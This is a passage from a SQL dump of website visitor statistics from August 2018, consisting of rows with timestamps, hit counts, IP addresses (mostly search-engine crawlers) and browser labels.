.36.149.26','other'),(289843,1534533407,1,1,0,0,'54.36.148.93','other'),(289844,1534533577,1,1,0,0,'54.36.148.91','other'),(289845,1534533617,1,1,0,0,'54.36.149.71','other'),(289846,1534533814,1,1,0,0,'54.36.149.91','other'),(289847,1534533851,1,1,0,0,'54.36.148.190','other'),(289848,1534533999,1,1,0,0,'54.36.148.79','other'),(289849,1534534071,1,0,1,0,'66.249.66.155',''),(289850,1534534077,1,1,0,0,'54.36.148.57','other'),(289851,1534534108,1,1,0,0,'54.36.148.215','other'),(289852,1534534270,1,1,0,0,'216.244.66.241','other'),(289853,1534534423,1,1,0,0,'54.36.148.222','other'),(289854,1534534478,1,1,0,0,'54.36.148.47','other'),(289855,1534534517,1,1,0,0,'54.36.148.221','other'),(289856,1534534625,3,3,0,0,'192.151.152.98','other'),(289857,1534534715,1,1,0,0,'54.36.148.161','other'),(289858,1534534848,1,1,0,0,'54.36.148.186','other'),(289859,1534534966,1,1,0,0,'54.36.148.217','other'),(289860,1534534979,1,1,0,0,'54.36.149.21','other'),(289861,1534535059,1,1,0,0,'54.36.149.98','other'),(289862,1534535063,1,1,0,0,'54.36.149.36','other'),(289863,1534535123,1,1,0,0,'54.36.148.18','other'),(289864,1534535139,1,1,0,0,'54.36.148.34','other'),(289865,1534535158,1,1,0,0,'66.249.66.157','chrome'),(289866,1534535439,1,1,0,0,'54.36.148.69','other'),(289867,1534535787,1,1,0,0,'54.36.148.243','other'),(289868,1534535826,3,3,0,0,'54.165.59.7','other'),(289869,1534536175,1,1,0,0,'54.36.149.101','other'),(289870,1534536229,1,1,0,0,'8.29.198.25','other'),(289871,1534536590,1,0,1,0,'66.249.66.157',''),(289872,1534536609,2,2,0,0,'54.36.148.17','other'),(289873,1534536833,1,1,0,0,'54.36.148.155','other'),(289874,1534537040,1,1,0,0,'66.249.66.59','chrome'),(289875,1534537488,1,1,0,0,'54.36.148.209','other'),(289876,1534537517,1,1,0,0,'54.165.59.7','other'),(289877,1534537525,1,0,1,0,'66.249.66.157',''),(289878,1534537727,1,0,1,0,'66.249.66.156',''),(289879,1534538090,1,1,0,0,'54.36.148.71','other'),(289880,1534538139,1,1,0,0,'54.36.148.203','other'),(289881,1534538693,1,1,0,0,'54.36.148.77','other'),(289882,1534538705,1,1,0,0,'8.29.198.25','other'),(289883,1534538741,1,1,0,0,'54.36.148.31','other'),(289884,1534538764,1,1,0,0,'178.95.188.39','chrome'),(289885,1534538793,1,1,0,0,'216.244.66.241','other'),(289886,1534539244,1,1,0,0,'54.36.148.228','other'),(289887,1534539507,2,2,0,0,'54.36.148.231','other'),(289888,1534540019,1,1,0,0,'95.163.255.96','other'),(289889,1534540091,1,0,1,0,'66.249.66.156',''),(289890,1534540131,1,1,0,0,'54.36.148.133','other'),(289891,1534540152,1,1,0,0,'54.36.148.215','other'),(289892,1534540163,1,1,0,0,'54.36.149.97','other'),(289893,1534540304,1,0,1,0,'66.249.66.61',''),(289894,1534540384,1,1,0,0,'54.36.149.5','other'),(289895,1534540541,1,1,0,0,'66.249.66.155','chrome'),(289896,1534540748,3,3,0,0,'157.55.39.250','other'),(289897,1534541357,1,1,0,0,'79.161.40.216','other'),(289898,1534541379,1,1,0,0,'54.36.148.144','other'),(289899,1534541479,1,1,0,0,'54.36.149.70','other'),(289900,1534541513,1,1,0,0,'54.36.149.3','other'),(289901,1534541730,1,1,0,0,'54.36.149.37','other'),(289902,1534541829,1,1,0,0,'216.244.66.241','other'),(289903,1534541972,1,1,0,0,'207.46.13.8','other'),(289904,1534542132,1,1,0,0,'54.36.149.107','other'),(289905,1534542147,1,1,0,0,'54.36.148.74','other'),(289906,1534542182,1,1,0,0,'54.36.148.244','other'),(289907,1534542461,1,1,0,0,'54.36.148.78','other'),(289908,1534542544,1,1,0,0,'54.36.149.27','other'),(289909,1534542627,1,1,0,0,'91.209.11.236','other'),(289910,1534542819,1,1,0,0,'54.36.148.143','other'),(289911,1534542899,1,1,0,0,'54.36.148.129','other'),(289912,1534542995,1,1,0,0,'54.36.148.231','other'),(289913,1534543011,1,1,0,0,'157.55.39.250','other'),(289914,1534543082,1,1,0,0,'66.249.66.61','chrome'),(289915,1534543104,1,1,0,0,'54.36.148.19','other'),(289916,1534543107,1,1,0,0,'54.36.148.149','other'),(289917,1534543430,1,1,0,0,'54.36.148.177','other'),(289918,1534543613,1,1,0,0,'54.36.149.52','other'),(289919,1534543648,1,1,0,0,'54.36.148.93','other'),(289920,1534543838,1,1,0,0,'54.36.148.142','other'),(289921,1534543856,1,0,1,0,'66.249.66.157',''),(289922,1534544072,1,1,0,0,'54.36.148.182','other'),(289923,1534544077,1,1,0,0,'54.36.148.110','other'),(289924,1534544085,1,1,0,0,'54.36.148.53','other'),(289925,1534544408,1,1,0,0,'54.36.148.193','other'),(289926,1534544473,1,1,0,0,'54.36.149.70','other'),(289927,1534544514,1,1,0,0,'54.36.148.15','other'),(289928,1534544553,1,1,0,0,'54.36.149.9','other'),(289929,1534544615,1,1,0,0,'54.36.148.107','other'),(289930,1534544694,1,1,0,0,'54.36.148.101','other'),(289931,1534544829,1,1,0,0,'54.36.148.42','other'),(289932,1534545047,1,0,1,0,'66.249.66.156',''),(289933,1534545231,1,1,0,0,'54.36.148.255','other'),(289934,1534545320,1,1,0,0,'54.36.149.66','other'),(289935,1534545378,1,1,0,0,'54.36.148.244','other'),(289936,1534545480,1,1,0,0,'54.36.148.50','other'),(289937,1534545510,1,1,0,0,'54.36.148.206','other'),(289938,1534545525,1,1,0,0,'95.163.255.95','other'),(289939,1534545698,1,1,0,0,'54.36.148.169','other'),(289940,1534545911,2,2,0,0,'54.36.148.40','other'),(289941,1534546031,1,1,0,0,'54.36.148.68','other'),(289942,1534546086,1,1,0,0,'54.36.149.61','other'),(289943,1534546116,1,0,1,0,'66.249.66.156',''),(289944,1534546273,1,0,1,0,'66.249.66.155',''),(289945,1534546291,1,1,0,0,'178.154.171.88','other'),(289946,1534546440,1,1,0,0,'54.36.148.13','other'),(289947,1534546684,1,1,0,0,'54.36.149.69','other'),(289948,1534547054,1,1,0,0,'8.29.198.25','other'),(289949,1534547201,1,1,0,0,'95.163.255.92','other'),(289950,1534547276,1,1,0,0,'54.36.148.249','other'),(289951,1534547368,1,1,0,0,'54.36.148.235','other'),(289952,1534569808,1,1,0,0,'54.36.148.124','other'),(289953,1534570231,1,1,0,0,'54.36.149.56','other'),(289954,1534570264,1,1,0,0,'54.36.148.233','other'),(289955,1534570313,1,1,0,0,'178.154.200.8','other'),(289956,1534570343,1,1,0,0,'141.8.142.123','other'),(289957,1534570358,1,1,0,0,'54.36.148.242','other'),(289958,1534570454,1,1,0,0,'37.9.113.186','other'),(289959,1534570487,1,1,0,0,'37.9.113.82','other'),(289960,1534570511,1,1,0,0,'37.9.113.134','other'),(289961,1534570535,1,1,0,0,'178.154.200.28','other'),(289962,1534570559,1,1,0,0,'178.154.200.7','other'),(289963,1534570586,1,1,0,0,'178.154.200.41','other'),(289964,1534570601,1,0,1,0,'66.249.66.156',''),(289965,1534570645,1,1,0,0,'54.36.149.69','other'),(289966,1534570648,1,1,0,0,'87.250.224.46','other'),(289967,1534570666,1,1,0,0,'54.36.148.45','other'),(289968,1534570772,1,1,0,0,'54.36.148.128','other'),(289969,1534570894,1,1,0,0,'54.36.148.157','other'),(289970,1534571098,1,0,1,0,'66.249.66.59',''),(289971,1534571204,1,1,0,0,'54.36.148.64','other'),(289972,1534571220,1,1,0,0,'54.36.149.93','other'),(289973,1534571357,1,1,0,0,'54.36.149.78','other'),(289974,1534571463,1,1,0,0,'54.36.149.9','other'),(289975,1534571763,1,1,0,0,'8.29.198.25','other'),(289976,1534571828,1,1,0,0,'54.36.149.82','other'),(289977,1534572140,1,1,0,0,'54.165.59.7','other'),(289978,1534572300,1,1,0,0,'54.36.149.105','other'),(289979,1534572469,1,1,0,0,'54.36.149.60','other'),(289980,1534572521,1,1,0,0,'54.36.149.22','other'),(289981,1534572633,1,1,0,0,'54.36.148.87','other'),(289982,1534572738,1,0,1,0,'66.249.66.157',''),(289983,1534572826,1,1,0,0,'54.36.148.104','other'),(289984,1534572849,1,1,0,0,'207.46.13.8','other'),(289985,1534572855,1,0,1,0,'66.249.66.155',''),(289986,1534572984,1,1,0,0,'54.36.148.252','other'),(289987,1534573128,1,1,0,0,'54.36.149.45','other'),(289988,1534573129,1,1,0,0,'40.77.167.170','other'),(289989,1534573162,1,1,0,0,'37.9.113.101','other'),(289990,1534573463,1,1,0,0,'54.36.148.227','other'),(289991,1534573637,1,1,0,0,'54.36.149.19','other'),(289992,1534573800,1,1,0,0,'40.77.167.152','other'),(289993,1534573914,1,1,0,0,'95.163.255.92','other'),(289994,1534574018,2,2,0,0,'95.163.255.94','other'),(289995,1534574269,1,1,0,0,'54.36.149.45','other'),(289996,1534574279,1,1,0,0,'54.36.148.135','other'),(289997,1534574307,1,1,0,0,'54.36.148.52','other'),(289998,1534574324,1,0,1,0,'66.249.66.155',''),(289999,1534574331,3,0,3,0,'66.249.66.156',''),(290000,1534574901,2,2,0,0,'216.244.66.241','other'),(290001,1534574965,1,1,0,0,'54.36.149.19','other'),(290002,1534575022,1,1,0,0,'95.163.255.99','other'),(290003,1534575078,1,1,0,0,'54.36.148.156','other'),(290004,1534575106,1,1,0,0,'54.36.149.4','other'),(290005,1534575203,1,1,0,0,'95.163.255.187','other'),(290006,1534575299,1,1,0,0,'37.9.113.182','other'),(290007,1534575329,2,2,0,0,'178.154.200.41','other'),(290008,1534575567,1,1,0,0,'95.163.255.93','other'),(290009,1534575736,1,1,0,0,'95.24.201.61','msie'),(290010,1534575758,1,0,1,0,'66.249.66.59',''),(290011,1534575893,1,1,0,0,'54.36.148.151','other'),(290012,1534576687,1,1,0,0,'54.36.148.190','other'),(290013,1534576716,1,1,0,0,'54.36.148.245','other'),(290014,1534576837,1,1,0,0,'46.211.134.24','chrome'),(290015,1534576866,1,1,0,0,'54.36.149.92','other'),(290016,1534577010,1,1,0,0,'178.154.171.88','other'),(290017,1534577291,1,1,0,0,'54.36.149.3','other'),(290018,1534577371,1,1,0,0,'54.36.148.122','other'),(290019,1534577429,2,2,0,0,'199.58.86.209','other'),(290020,1534577450,1,0,1,0,'66.249.66.57',''),(290021,1534577550,1,1,0,0,'54.36.149.105','other'),(290022,1534577555,1,1,0,0,'66.249.66.155','chrome'),(290023,1534578029,2,2,0,0,'194.187.170.146','other'),(290024,1534578034,1,1,0,0,'54.36.148.255','other'),(290025,1534578230,1,1,0,0,'54.36.148.116','other'),(290026,1534578645,2,2,0,0,'54.36.148.18','other'),(290027,1534578762,1,1,0,0,'54.36.149.48','other'),(290028,1534578857,1,1,0,0,'92.113.189.235','chrome'),(290029,1534578990,3,3,0,0,'194.187.170.146','other'),(290030,1534579186,1,1,0,0,'54.36.148.149','other'),(290031,1534579321,1,0,1,0,'66.249.66.157',''),(290032,1534579337,1,0,1,0,'66.249.66.156',''),(290033,1534579585,1,1,0,0,'72.167.190.24','firefox'),(290034,1534579655,1,1,0,0,'141.8.142.74','other'),(290035,1534579740,1,1,0,0,'54.36.148.223','other'),(290036,1534579744,1,1,0,0,'66.102.9.136','chrome'),(290037,1534580074,1,1,0,0,'8.29.198.26','other'),(290038,1534580161,1,1,0,0,'54.36.148.198','other'),(290039,1534580221,1,1,0,0,'54.36.148.137','other'),(290040,1534580272,1,0,1,0,'66.249.66.157',''),(290041,1534580291,1,1,0,0,'54.36.148.211','other'),(290042,1534580350,1,1,0,0,'54.36.149.100','other'),(290043,1534580419,1,1,0,0,'54.36.148.127','other'),(290044,1534580637,1,1,0,0,'54.165.59.7','other'),(290045,1534580690,1,1,0,0,'54.36.148.71','other'),(290046,1534580709,1,1,0,0,'54.36.148.134','other'),(290047,1534580758,3,3,0,0,'194.187.170.146','other'),(290048,1534580930,1,1,0,0,'54.36.148.78','other'),(290049,1534581079,1,1,0,0,'54.36.149.2','other'),(290050,1534581237,1,1,0,0,'54.36.148.32','other'),(290051,1534581331,1,1,0,0,'54.36.149.4','other'),(290052,1534581491,2,2,0,0,'37.9.113.182','other'),(290053,1534581505,1,1,0,0,'178.154.200.41','other'),(290054,1534581572,1,1,0,0,'54.36.148.82','other'),(290055,1534581733,4,4,0,0,'194.187.170.146','other'),(290056,1534581785,2,2,0,0,'54.36.149.100','other'),(290057,1534581786,1,1,0,0,'178.154.171.60','other'),(290058,1534581788,2,0,2,0,'66.249.66.156',''),(290059,1534581802,1,1,0,0,'178.154.171.88','other'),(290060,1534581908,1,1,0,0,'54.36.148.192','other'),(290061,1534581998,1,1,0,0,'54.36.148.142','other'),(290062,1534582029,1,1,0,0,'54.36.149.40','other'),(290063,1534582146,1,1,0,0,'54.36.149.44','other'),(290064,1534582486,1,1,0,0,'54.36.148.196','other'),(290065,1534582503,1,1,0,0,'54.36.148.34','other'),(290066,1534582581,1,1,0,0,'54.36.149.18','other'),(290067,1534582591,1,1,0,0,'54.36.149.77','other'),(290068,1534582592,1,1,0,0,'216.244.66.241','other'),(290069,1534582619,1,1,0,0,'8.29.198.26','other'),(290070,1534582637,1,1,0,0,'54.36.148.107','other'),(290071,1534582699,1,1,0,0,'54.36.148.12','other'),(290072,1534582820,1,1,0,0,'54.36.149.85','other'),(290073,1534583138,1,1,0,0,'54.36.149.68','other'),(290074,1534583141,1,1,0,0,'178.154.200.41','other'),(290075,1534583675,1,1,0,0,'54.36.148.115','other'),(290076,1534583804,1,1,0,0,'54.36.149.67','other'),(290077,1534583865,1,1,0,0,'54.36.148.67','other'),(290078,1534583935,3,3,0,0,'194.187.170.146','other'),(290079,1534584140,1,1,0,0,'54.36.149.4','other'),(290080,1534584464,1,1,0,0,'54.36.149.53','other'),(290081,1534584488,1,1,0,0,'54.36.148.103','other'),(290082,1534584522,1,1,0,0,'46.101.95.126','other'),(290083,1534584615,1,1,0,0,'216.244.66.241','other'),(290084,1534584810,2,0,2,0,'66.249.66.57',''),(290085,1534584873,1,1,0,0,'54.36.149.47','other'),(290086,1534585029,1,1,0,0,'54.36.149.32','other'),(290087,1534585033,1,1,0,0,'54.36.149.95','other'),(290088,1534585235,3,3,0,0,'194.187.170.146','other'),(290089,1534585550,1,1,0,0,'54.36.148.176','other'),(290090,1534585624,1,1,0,0,'54.36.148.10','other'),(290091,1534585741,1,0,1,0,'66.249.66.155',''),(290092,1534585784,1,1,0,0,'54.36.148.152','other'),(290093,1534585837,1,1,0,0,'95.163.255.97','other'),(290094,1534585867,1,1,0,0,'95.163.255.98','other'),(290095,1534585870,1,1,0,0,'54.36.148.129','other'),(290096,1534586014,1,0,1,0,'66.249.66.156',''),(290097,1534586067,1,1,0,0,'54.36.149.19','other'),(290098,1534586076,1,1,0,0,'54.36.149.0','other'),(290099,1534586117,1,1,0,0,'54.36.148.130','other'),(290100,1534586127,1,1,0,0,'54.36.148.223','other'),(290101,1534586293,1,1,0,0,'54.36.148.105','other'),(290102,1534586295,3,3,0,0,'194.187.170.146','other'),(290103,1534586630,1,1,0,0,'54.36.148.212','other'),(290104,1534586641,1,1,0,0,'54.36.148.230','other'),(290105,1534586770,1,1,0,0,'54.36.149.81','other'),(290106,1534586849,1,1,0,0,'54.36.148.39','other'),(290107,1534586927,1,1,0,0,'54.36.148.101','other'),(290108,1534587331,2,2,0,0,'194.187.170.146','other'),(290109,1534587336,1,1,0,0,'54.36.148.248','other'),(290110,1534587381,1,0,1,0,'66.249.66.156',''),(290111,1534587385,1,1,0,0,'54.36.149.10','other'),(290112,1534587394,1,1,0,0,'54.36.148.155','other'),(290113,1534587424,1,1,0,0,'54.36.148.185','other'),(290114,1534587490,1,1,0,0,'54.36.149.97','other'),(290115,1534587527,1,1,0,0,'54.36.148.175','other'),(290116,1534587591,1,1,0,0,'54.36.148.62','other'),(290117,1534587812,1,1,0,0,'54.36.148.173','other'),(290118,1534587820,1,1,0,0,'141.8.132.19','other'),(290119,1534588102,1,1,0,0,'54.36.148.107','other'),(290120,1534588282,1,1,0,0,'54.36.149.106','other'),(290121,1534588300,1,1,0,0,'54.36.148.249','other'),(290122,1534588309,21,21,0,0,'144.217.5.52','other'),(290123,1534588356,1,1,0,0,'54.36.148.248','other'),(290124,1534588379,1,1,0,0,'54.36.148.104','other'),(290125,1534588447,1,1,0,0,'54.36.148.199','other'),(290126,1534588477,6,6,0,0,'194.187.170.146','other'),(290127,1534588940,2,2,0,0,'178.154.200.41','other'),(290128,1534588991,1,1,0,0,'54.36.148.146','other'),(290129,1534589144,1,1,0,0,'54.36.148.246','other'),(290130,1534589148,1,1,0,0,'54.36.148.97','other'),(290131,1534589159,1,1,0,0,'54.36.148.54','other'),(290132,1534589272,1,1,0,0,'54.36.148.89','other'),(290133,1534589373,1,1,0,0,'54.36.149.47','other'),(290134,1534589449,1,1,0,0,'54.36.148.172','other'),(290135,1534589585,1,1,0,0,'87.250.224.46','other'),(290136,1534589624,5,5,0,0,'194.187.170.146','other'),(290137,1534589777,1,1,0,0,'54.36.148.16','other'),(290138,1534589841,2,0,2,0,'66.249.66.155',''),(290139,1534589984,1,1,0,0,'54.36.148.25','other'),(290140,1534590215,1,1,0,0,'54.36.148.150','other'),(290141,1534590302,1,1,0,0,'54.36.149.64','other'),(290142,1534590438,1,1,0,0,'54.36.149.15','other'),(290143,1534590461,1,1,0,0,'95.163.255.171','other'),(290144,1534590499,1,1,0,0,'54.36.148.10','other'),(290145,1534590528,1,1,0,0,'54.36.148.224','other'),(290146,1534590913,1,1,0,0,'8.29.198.26','other'),(290147,1534590985,1,1,0,0,'194.187.170.146','other'),(290148,1534591009,1,1,0,0,'54.36.148.113','other'),(290149,1534591049,1,1,0,0,'141.8.142.74','other'),(290150,1534591114,1,1,0,0,'54.36.148.249','other'),(290151,1534591202,1,1,0,0,'54.36.148.76','other'),(290152,1534591206,40,40,0,0,'192.99.242.216','chrome'),(290153,1534591236,1,1,0,0,'54.36.148.165','other'),(290154,1534591239,1,1,0,0,'54.36.149.0','other'),(290155,1534591306,1,1,0,0,'54.36.148.148','other'),(290156,1534591358,1,1,0,0,'54.36.148.32','other'),(290157,1534591451,1,1,0,0,'54.36.148.140','other'),(290158,1534591546,1,1,0,0,'54.36.148.90','other'),(290159,1534591800,1,1,0,0,'54.36.149.24','other'),(290160,1534591902,1,0,1,0,'66.249.66.61',''),(290161,1534592075,1,1,0,0,'54.36.149.82','other'),(290162,1534592129,1,1,0,0,'54.36.148.196','other'),(290163,1534592257,1,1,0,0,'54.36.148.19','other'),(290164,1534592294,2,0,2,0,'66.249.66.155',''),(290165,1534592457,1,1,0,0,'54.36.149.54','other'),(290166,1534592489,1,1,0,0,'54.36.149.96','other'),(290167,1534592559,2,2,0,0,'216.244.66.241','other'),(290168,1534592842,1,1,0,0,'37.9.113.101','other'),(290169,1534592864,4,4,0,0,'194.187.170.146','other'),(290170,1534592929,1,0,1,0,'66.249.66.156',''),(290171,1534592992,1,1,0,0,'54.36.149.105','other'),(290172,1534593071,1,1,0,0,'213.180.203.8','other'),(290173,1534593090,1,1,0,0,'91.209.11.236','other'),(290174,1534593194,1,1,0,0,'54.36.148.78','other'),(290175,1534593469,1,1,0,0,'8.29.198.26','other'),(290176,1534593478,1,1,0,0,'54.36.148.67','other'),(290177,1534593531,1,0,1,0,'66.249.66.157',''),(290178,1534593792,3,3,0,0,'194.187.170.146','other'),(290179,1534593817,1,1,0,0,'54.36.148.90','other'),(290180,1534593891,1,1,0,0,'54.36.148.137','other'),(290181,1534593893,1,1,0,0,'141.8.132.19','other'),(290182,1534593910,1,1,0,0,'54.36.149.89','other'),(290183,1534593946,1,1,0,0,'54.36.148.194','other'),(290184,1534594125,1,1,0,0,'141.8.142.74','other'),(290185,1534594240,1,1,0,0,'54.36.149.55','other'),(290186,1534594362,1,1,0,0,'54.36.148.71','other'),(290187,1534594597,1,1,0,0,'54.36.148.98','other'),(290188,1534594719,2,2,0,0,'194.187.170.146','other'),(290189,1534594840,1,1,0,0,'40.77.167.145','other'),(290190,1534594857,1,0,1,0,'66.249.66.155',''),(290191,1534594919,1,1,0,0,'54.36.148.15','other'),(290192,1534595000,1,1,0,0,'54.36.148.224','other'),(290193,1534595013,1,1,0,0,'178.154.171.88','other'),(290194,1534595184,1,1,0,0,'54.36.149.7','other'),(290195,1534595561,1,1,0,0,'54.36.148.72','other'),(290196,1534595612,1,1,0,0,'54.36.148.144','other'),(290197,1534595739,1,1,0,0,'54.36.148.11','other'),(290198,1534595757,1,1,0,0,'216.244.66.241','other'),(290199,1534595810,1,1,0,0,'54.36.148.14','other'),(290200,1534595856,1,1,0,0,'54.36.149.40','other'),(290201,1534595932,1,1,0,0,'178.154.171.88','other'),(290202,1534595983,1,1,0,0,'37.9.113.182','other'),(290203,1534596214,1,0,1,0,'66.249.66.157',''),(290204,1534596237,1,0,1,0,'66.249.66.156',''),(290205,1534596331,1,1,0,0,'54.36.149.33','other'),(290206,1534596387,1,1,0,0,'54.36.149.30','other'),(290207,1534596783,1,1,0,0,'54.36.148.167','other'),(290208,1534596804,1,1,0,0,'54.36.148.92','other'),(290209,1534596805,1,1,0,0,'54.36.149.104','other'),(290210,1534596863,1,1,0,0,'141.8.142.74','other'),(290211,1534596868,1,1,0,0,'95.163.255.173','other'),(290212,1534596968,1,0,1,0,'66.249.66.155',''),(290213,1534596970,1,1,0,0,'54.36.148.21','other'),(290214,1534597257,1,1,0,0,'54.36.148.38','other'),(290215,1534597405,1,0,1,0,'66.249.66.59',''),(290216,1534597424,1,1,0,0,'54.36.148.28','other'),(290217,1534597738,1,1,0,0,'54.36.148.60','other'),(290218,1534597786,1,1,0,0,'54.36.148.156','other'),(290219,1534598011,1,1,0,0,'87.250.224.46','other'),(290220,1534598014,1,1,0,0,'5.45.207.83','other'),(290221,1534598190,1,1,0,0,'54.36.148.99','other'),(290222,1534598198,1,1,0,0,'185.138.228.178','chrome'),(290223,1534598211,1,1,0,0,'54.36.148.87','other'),(290224,1534598332,1,1,0,0,'54.36.148.120','other'),(290225,1534598496,1,1,0,0,'54.36.148.198','other'),(290226,1534598498,1,1,0,0,'54.36.148.186','other'),(290227,1534598613,1,1,0,0,'178.154.171.88','other'),(290228,1534598746,1,1,0,0,'54.36.148.131','other'),(290229,1534598961,2,2,0,0,'40.77.167.68','other'),(290230,1534599369,1,1,0,0,'54.36.148.190','other'),(290231,1534599378,1,1,0,0,'54.36.148.199','other'),(290232,1534599545,1,1,0,0,'141.8.142.167','other'),(290233,1534599693,1,1,0,0,'91.196.178.133','firefox'),(290234,1534599741,1,1,0,0,'157.55.39.36','other'),(290235,1534599927,1,1,0,0,'54.36.148.27','other'),(290236,1534599994,1,0,1,0,'66.249.66.155',''),(290237,1534600008,1,1,0,0,'54.36.148.205','other'),(290238,1534600075,1,1,0,0,'54.36.148.236','other'),(290239,1534600112,1,0,1,0,'66.249.66.157',''),(290240,1534600152,1,1,0,0,'54.36.148.240','other'),(290241,1534600177,1,1,0,0,'91.196.178.175','chrome'),(290242,1534600473,1,1,0,0,'37.9.113.115','other'),(290243,1534600802,1,1,0,0,'54.36.148.54','other'),(290244,1534600865,1,1,0,0,'54.36.148.171','other'),(290245,1534601071,1,1,0,0,'141.8.132.19','other'),(290246,1534601341,1,0,1,0,'66.249.66.156',''),(290247,1534601359,1,0,1,0,'66.249.66.155',''),(290248,1534601758,1,1,0,0,'8.29.198.26','other'),(290249,1534601869,1,1,0,0,'178.154.200.41','other'),(290250,1534602007,1,1,0,0,'54.36.148.201','other'),(290251,1534602096,1,1,0,0,'157.55.39.36','other'),(290252,1534602161,1,1,0,0,'54.36.149.88','other'),(290253,1534602213,1,1,0,0,'54.36.148.147','other'),(290254,1534602268,1,1,0,0,'213.180.203.8','other'),(290255,1534602320,1,1,0,0,'216.244.66.241','other'),(290256,1534602324,1,1,0,0,'95.163.255.93','other'),(290257,1534602422,1,1,0,0,'54.36.148.161','other'),(290258,1534602619,1,1,0,0,'54.36.148.143','other'),(290259,1534602631,1,1,0,0,'54.36.149.80','other'),(290260,1534602774,1,1,0,0,'54.36.148.114','other'),(290261,1534602855,1,1,0,0,'157.55.39.178','other'),(290262,1534602892,1,1,0,0,'54.36.148.34','other'),(290263,1534602923,1,0,1,0,'66.249.66.155',''),(290264,1534603105,1,1,0,0,'54.36.148.203','other'),(290265,1534603397,1,1,0,0,'54.36.148.77','other'),(290266,1534603399,1,1,0,0,'54.36.148.228','other'),(290267,1534603464,1,1,0,0,'54.36.148.140','other'),(290268,1534603486,1,1,0,0,'54.36.149.47','other'),(290269,1534603692,1,1,0,0,'54.36.148.106','other'),(290270,1534603694,1,1,0,0,'54.36.148.229','other'),(290271,1534603942,1,1,0,0,'54.36.148.45','other'),(290272,1534604003,1,1,0,0,'54.36.148.196','other'),(290273,1534604314,1,1,0,0,'54.36.149.58','other'),(290274,1534604322,1,1,0,0,'8.29.198.25','other'),(290275,1534604591,1,1,0,0,'54.36.148.130','other'),(290276,1534604593,1,1,0,0,'54.36.149.31','other'),(290277,1534604634,1,1,0,0,'54.36.148.159','other'),(290278,1534604656,1,1,0,0,'188.230.43.254','other'),(290279,1534604749,1,1,0,0,'54.36.149.46','other'),(290280,1534604777,1,1,0,0,'92.113.189.235','chrome'),(290281,1534604813,1,1,0,0,'54.36.148.17','other'),(290282,1534604838,1,1,0,0,'54.36.148.146','other'),(290283,1534605002,2,2,0,0,'216.244.66.241','other'),(290284,1534605011,1,1,0,0,'141.8.142.134','other'),(290285,1534605013,1,1,0,0,'37.9.113.110','other'),(290286,1534605014,1,1,0,0,'37.9.113.101','other'),(290287,1534605111,1,1,0,0,'54.36.148.101','other'),(290288,1534605487,5,5,0,0,'40.77.167.145','other'),(290289,1534605563,1,0,1,0,'66.249.66.157',''),(290290,1534605838,1,1,0,0,'54.36.148.13','other'),(290291,1534605921,1,1,0,0,'216.244.66.241','other'),(290292,1534605954,3,3,0,0,'157.55.39.36','other'),(290293,1534606008,1,1,0,0,'54.36.149.61','other'),(290294,1534606241,2,2,0,0,'40.77.167.123','other'),(290295,1534606438,1,1,0,0,'54.36.149.48','other'),(290296,1534606558,1,1,0,0,'188.230.43.254','other'),(290297,1534606663,1,1,0,0,'66.249.66.157','chrome'),(290298,1534606687,1,1,0,0,'54.36.148.240','other'),(290299,1534607008,1,1,0,0,'54.36.148.49','other'),(290300,1534607054,3,0,3,0,'66.249.66.155',''),(290301,1534607064,1,1,0,0,'54.36.148.15','other'),(290302,1534607285,1,1,0,0,'54.36.149.53','other'),(290303,1534607572,1,1,0,0,'54.36.148.45','other'),(290304,1534607808,1,1,0,0,'54.36.148.220','other'),(290305,1534607878,1,1,0,0,'54.36.149.23','other'),(290306,1534608325,1,1,0,0,'54.36.148.247','other'),(290307,1534608498,1,1,0,0,'54.36.148.189','other'),(290308,1534608850,1,1,0,0,'188.230.43.254','other'),(290309,1534608921,1,1,0,0,'54.36.148.236','other'),(290310,1534609272,1,1,0,0,'54.36.149.45','other'),(290311,1534609298,1,1,0,0,'157.55.39.11','other'),(290312,1534609386,1,1,0,0,'54.36.148.146','other'),(290313,1534609393,1,1,0,0,'54.36.149.67','other'),(290314,1534609399,1,1,0,0,'54.36.148.239','other'),(290315,1534609492,1,1,0,0,'54.36.149.13','other'),(290316,1534609739,1,1,0,0,'54.36.148.177','other'),(290317,1534609891,1,0,1,0,'66.249.66.155',''),(290318,1534609916,1,1,0,0,'176.14.243.50','chrome'),(290319,1534610014,1,1,0,0,'54.36.148.88','other'),(290320,1534610508,1,0,1,0,'66.249.66.157',''),(290321,1534610696,2,2,0,0,'216.244.66.241','other'),(290322,1534610872,1,1,0,0,'54.36.148.53','other'),(290323,1534611333,1,1,0,0,'54.36.148.227','other'),(290324,1534611424,1,0,1,0,'66.249.66.156',''),(290325,1534611426,1,1,0,0,'54.36.148.133','other'),(290326,1534611556,1,1,0,0,'40.77.167.123','other'),(290327,1534611591,1,1,0,0,'54.36.148.52','other'),(290328,1534611757,1,1,0,0,'54.36.148.119','other'),(290329,1534612042,2,0,2,0,'66.249.66.155',''),(290330,1534612123,1,1,0,0,'54.36.148.205','other'),(290331,1534612159,1,1,0,0,'54.36.148.37','other'),(290332,1534612297,1,0,1,0,'66.249.66.157',''),(290333,1534612324,1,1,0,0,'54.36.148.188','other'),(290334,1534612562,1,1,0,0,'54.36.149.82','other'),(290335,1534612603,1,1,0,0,'8.29.198.25','other'),(290336,1534612978,1,1,0,0,'54.36.149.22','other'),(290337,1534613010,1,1,0,0,'66.249.66.155','chrome'),(290338,1534613136,2,0,2,0,'66.249.66.156',''),(290339,1534613211,1,1,0,0,'54.36.148.14','other'),(290340,1534613213,2,2,0,0,'54.36.148.147','other'),(290341,1534613348,1,1,0,0,'54.36.149.80','other'),(290342,1534613429,1,1,0,0,'54.36.149.58','other'),(290343,1534613827,1,1,0,0,'54.36.148.173','other'),(290344,1534613955,1,1,0,0,'54.36.149.43','other'),(290345,1534613994,1,1,0,0,'54.36.148.186','other'),(290346,1534614030,1,1,0,0,'216.244.66.241','other'),(290347,1534614050,1,1,0,0,'95.163.255.97','other'),(290348,1534614075,1,1,0,0,'54.36.149.65','other'),(290349,1534614097,2,2,0,0,'54.36.149.92','other'),(290350,1534614173,1,1,0,0,'54.36.149.95','other'),(290351,1534614295,1,1,0,0,'54.36.148.197','other'),(290352,1534614341,1,1,0,0,'54.36.148.163','other'),(290353,1534614513,2,2,0,0,'141.8.142.74','other'),(290354,1534614539,1,1,0,0,'54.36.148.76','other'),(290355,1534614546,1,1,0,0,'54.36.148.52','other'),(290356,1534614604,1,1,0,0,'54.36.148.22','other'),(290357,1534614689,1,1,0,0,'54.36.149.33','other'),(290358,1534614825,1,1,0,0,'54.36.148.219','other'),(290359,1534615002,1,0,1,0,'66.249.66.157',''),(290360,1534615113,4